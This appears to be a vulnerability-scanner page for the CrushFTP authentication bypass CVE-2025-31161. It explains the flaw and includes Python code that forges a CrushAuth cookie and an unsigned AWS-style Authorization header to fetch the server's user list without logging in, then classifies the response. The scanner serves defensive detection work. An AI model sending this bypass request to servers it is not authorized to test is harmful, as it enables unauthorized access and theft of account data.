CVE-2025-31161 Scanner

CVE-2025-31161 Scanner - Unauthorized Admin Access vulnerability in CrushFTP

Short Info

Level: Critical
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 10 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -

CrushFTP is a file transfer server used by organizations to manage and automate data exchange over multiple protocols. It is commonly deployed in enterprise environments and supports user access control, data encryption, and extensive logging, and it is often chosen for its support of FTP, SFTP, HTTP, HTTPS, and WebDAV. It is used across industries including government, financial services, and IT infrastructure. The server is managed through a web interface that offers both administrative and user-level access, so its authentication mechanisms are the boundary that keeps hosted data separated from unauthenticated clients.

CVE-2025-31161 lets an unauthenticated, remote attacker bypass the authentication checks of the CrushFTP web interface. The attacker sends a crafted HTTP request that carries a forged Authorization header together with a CrushAuth session cookie the server never issued. Because the server does not properly validate these session tokens before acting on the request, it treats the request as authenticated. The attacker can then retrieve data reserved for logged-in users, such as the list of user accounts, and from there move on to administrative functions. The flaw poses a critical risk to confidentiality and integrity, and, through the configuration changes it enables, to availability.

The check targets the `/WebInterface/function/` endpoint with the `getUserList` command. The probe carries a manipulated `CrushAuth` cookie and a forged AWS-style `Authorization` header (the format CrushFTP accepts for S3-compatible requests) that names an account without a valid signature. On a vulnerable server the response is an XML document listing the user accounts, including privileged accounts such as `crushadmin`. No prior authentication is required and the request works remotely. The scanner reports the host as vulnerable only when all three matchers hit: an HTTP 200 status, a `text/xml` content type, and the string `crushadmin` in the response body. Because the probe itself names `crushadmin` in the Authorization header, a hit should be confirmed against an actual XML user list rather than an error page that echoes the request.
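The probe and the three matchers described above, as an added example in Python; this is not the scanner's own code. The endpoint, the `getUserList` command, the `CrushAuth` cookie, the AWS-style `Authorization` header and the matchers come from the description on this page. The exact layout of the forged cookie, the `c2f` query parameter, the `currentAuth` cookie and the `Credential=` value are assumptions taken from public write-ups of the bypass and may differ from what this scanner sends; the sample response body is constructed, not captured from a real server. The classifier adds one guard the page's matchers do not have: the body must be well-formed XML with `crushadmin` as an element value, so an error page that merely echoes the request is reported as inconclusive instead of vulnerable.

```python
"""Probe builder and response classifier for the CrushFTP CVE-2025-31161 check.

Added example, not the scanner's code. Cookie layout, c2f, currentAuth and the
Credential= value are ASSUMED from public write-ups of the bypass.
"""
import http.client
import secrets
import string
import time
import xml.etree.ElementTree as ET
from typing import Dict, Tuple
from urllib.parse import urlencode

_ALPHABET = string.ascii_letters + string.digits

# Constructed sample of a successful getUserList response (not a real capture).
SAMPLE_HIT = (
    '<?xml version="1.0" encoding="UTF-8"?><result>'
    "<response_status>OK</response_status><response_data><user_list>"
    "<user>crushadmin</user><user>backup</user></user_list>"
    "</response_data></result>"
)


def build_probe(host: str, username: str = "crushadmin") -> Tuple[str, Dict[str, str]]:
    """Return (request path, headers) for one unauthenticated getUserList probe.

    ASSUMED: the forged CrushAuth value is "<unix time>_<random text>" and the
    c2f query parameter must equal its last four characters.
    """
    rand = "".join(secrets.choice(_ALPHABET) for _ in range(30))
    token = f"{int(time.time())}_{rand}"
    c2f = token[-4:]
    path = "/WebInterface/function/?" + urlencode({"command": "getUserList", "c2f": c2f})
    headers = {
        "Host": host,
        # A session cookie the server never issued; the bypass accepts it anyway.
        "Cookie": f"CrushAuth={token}; currentAuth={c2f}",
        # AWS-style header naming the account to impersonate, with no signature.
        "Authorization": f"AWS4-HMAC-SHA256 Credential={username}/",
    }
    return path, headers


def classify(status: int, headers: Dict[str, str], body: str) -> str:
    """Apply the scanner's three matchers (AND-ed) plus a well-formed-XML guard.

    Returns "vulnerable", "not_vulnerable" or "inconclusive". The probe itself
    contains "crushadmin", so a 200 text/xml page that only echoes the request
    must not count as a hit.
    """
    ctype = {k.lower(): v for k, v in headers.items()}.get("content-type", "")
    if status != 200 or "text/xml" not in ctype.lower() or "crushadmin" not in body:
        return "not_vulnerable"
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "inconclusive"
    # Accept only when crushadmin is an element's text or attribute value
    # (the user list), not a fragment of echoed request headers.
    for el in root.iter():
        if (el.text or "").strip() == "crushadmin" or "crushadmin" in el.attrib.values():
            return "vulnerable"
    return "inconclusive"


def send_probe(host: str, port: int = 443, tls: bool = True, timeout: float = 10.0) -> str:
    """Send one probe to a host you are authorized to test and classify the reply."""
    path, headers = build_probe(host)
    conn_cls = http.client.HTTPSConnection if tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers=headers)
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", "replace")
        return classify(resp.status, dict(resp.getheaders()), body)
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "ftp.example.test"
    print(target, send_probe(target) if len(sys.argv) > 1 else classify(200, {"Content-Type": "text/xml"}, SAMPLE_HIT))
```

Run it with a hostname to probe a server you are authorized to test; without arguments it only classifies the constructed sample. The estimated scan time of 10 seconds above matches a single request with a timeout of that order.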

Successful exploitation lets an attacker read, and potentially modify, the user list, including administrative accounts. With that foothold the attacker can create new users or alter server settings, which can lead to data leakage, unauthorized configuration changes, full compromise of the server, and, if chained with further flaws, remote code execution. An organization running an unpatched CrushFTP instance exposed to untrusted networks should treat it as at risk of a complete breach until the issue is mitigated. The impact on confidentiality, integrity, and availability is rated critical.
